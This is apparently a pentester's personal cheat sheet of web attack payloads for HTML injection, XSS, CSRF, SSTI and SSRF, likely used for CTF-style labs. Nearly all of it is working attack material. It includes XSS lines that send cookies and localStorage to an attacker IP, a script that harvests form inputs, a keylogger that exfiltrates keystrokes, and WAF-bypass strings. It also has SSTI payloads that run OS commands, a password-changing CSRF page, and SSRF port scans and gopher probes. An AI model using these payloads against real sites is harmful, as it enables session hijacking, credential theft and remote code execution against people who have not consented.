XSS / HTMLi / (S/C)SRF / SSTI

01. HTML Injection

• Basic Test Payloads

<h1>h4rithd was here</h1>
<b>h4rithd was here<b>
<img src="https://media.giphy.com/media/3XpvBjjMWtYYIOtOlp/giphy.gif"/>
<img src="https://media.tenor.com/He2W0AQvZfsAAAAC/hacked-hack.gif"/>

<marquee direction="up">h4rithd was here.</marquee>
<marquee direction="left" behavior="alternate">h4rithd was here</marquee>
<marquee behavior="scroll" direction="up"><img src="https://c.tenor.com/uXWSDlYIKl0AAAAM/danceroblox.gif"/></marquee>

02. Cross Site Scripting (XSS)

• Steal Cookie

## ------------------| Setup on my machine
#### Basic [h4rithd.js
fetch("http://<IP>/favicon.ico?c="+document.cookie);
#### Encoded
fetch("http://<IP>/favicon.ico?c=" + btoa(document.cookie))
fetch("http://<IP>/favicon.ico?c=" + encodeURIComponent(document.cookie))

## ------------------| Payload 
<script src="http://<IP>/h4rithd.js"></script>

• Payloads

nc -lvnp 80
<script>document.write('<img src="http://<MYIP>/logo.gif?cookie='+document.cookie+'"/>')</script>
<script>new Image().src="http://<MYIP>/logo.jpg?output="+document.cookie;</script>

## ------------------| Common paylods
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efim)``>
<script>alert(123)</script>
<script>location.replace("https://h4rithd.com")</script>
<script>alert(localStorage.authorizations)</script>
<script>alert(JSON.stringify(localStorage))</script>
<img src='https://127.0.0.1/fav.ico?j0k3n='+JSON.stringify(localStorage);'--!>
"/><script>alert(123)</script>
"/><IMG SRC=x onmouseover="alert('xss')">
<IMG SRC=x onmouseover="alert('xss')">
<img src=http://10.10.14.22/hit/>
<img src=x onerror=this.src='http://10.10.14.22/?cookies='+btoa(document.cookie)/>  
<xss id=x tabindex=1 onactivate=alert(1)></xss>
<script>location.replace("https://h4rithd.com")</script>

## ------------------| Other Paylods
<IMG onmouseover="alert('xss')">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC= onmouseover="alert('xss')">
<IMG SRC=# onmouseover="alert('xss')">
<IMG SRC=x onmouseover="alert('xss')">
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"\>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
\<a onmouseover="alert(document.cookie)"\>xss link\</a\>
\<a onmouseover=alert(document.cookie)\>xss link\</a\>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

## ------------------| WAF Bypass
<svg on onload=(alert)(123)>
<svg onx=() onload=(confirm)(1)>
<x"/onclick=(confirm)()>h4rithd!
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)>
javascript:{ alert`0` }
1'"><img/src/onerror=.1|alert``>
<img ignored=() src=x onerror=prompt(1)>

• XMLHttpRequest

## ------------------| Host this from your end
var xhr = new XMLHttpRequest();
var url = "http://localhost/admin/backdoorchecker.php";
var params = "cmd=dir | ping -n 2 10.10.14.22";
xhr.open("POST", url);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.withCredentials = true;
xhr.send(params);

# catch this via payload
<script src=http://10.10.14.22/script.js></script>

• Server Side XSS (Dynamic PDF)

## ------------------| Read local file
<script>
x=new XMLHttpRequest;
x.onload=function(){document.write(this.responseText)};
x.open("GET","file:///etc/passwd");x.send();
</script>

## If you need base64 encoded text, then use thisone.
x.onload=function(){document.write(btoa(this.responseText))};

• Other APIs

## ------------------| Start the sever for fetch the data
sudo python3 -m http.server 80

## ------------------| Extract stored passwords
<script>
for(let values of document.getElementsByTagName("input")){fetch("http://IP/favicon.ico?data=" + values.value);}
</script>

## ------------------| Keylogers
<script>
function klog(event){fetch("http://IP/favicon.ico?data=" + event.key);}
document.addEventListener('keydown',klog);
</script>

03. Cross-Site Request Forgery (CSRF)

• Create Payload

<html>
   <iframe src="http://MyIP/IFrameIsWorkingFine"></iframe>
   <iframe src="http://10.10.10.97/ChangePass?password=Welcome123"></iframe>
</html>

04. Server-Side Template Injection (SSTI)

source:PayloadsAllTheThings

{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
*{7*7}
#{1+3+3+7}
${{<%[%'"}}%\.
{{.}}
{{user}}
{{config}}
{{password}}

{%include user%}
{%include config%}
{% include config %}
{%include password%}

{{ get_flashed_messages.globals.builtins.open("/etc/passwd").read() }}
{{ namespace.__init__.__globals__.os.popen('id').read() }}
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}

## ------------------| SpringFramework’s 
{"harithd".replace("a","4")}
{"".getClass().forName("java.lang.Runtime").getRuntime().exec("ping -c 2 <IP>")}

• Click here for list of payloads.

05. Server-Side Request Forgery (SSRF)

### Setup local web server 
sudo python3 -m http.server 80

### Browse URL

### scan localports
/url.php?path=http://localhost:80
wfuzz -u 'http://10.10.10.55:60000/url.php?path=localhost:FUZZ' -z range,1-65535 --hl 2    

• Gopher [Link]

## ------------------| Test Vuln
### Setup Listener
sudo nc -lvnp 80
### Check if if vuln 
### [\n ==> %0a, %25%30%61 (dubbel Encoded) , space ==> %20, %25%32%30 (dubbel Encoded)]
/url.php?path=gopher://<IP>:80/_GET / HTTP/1.0
/url.php?path=gopher://<IP>:80/_GET%%32%30%2fh4rithd.com%25%32%30HTTP/1.1
### Try to send internal requests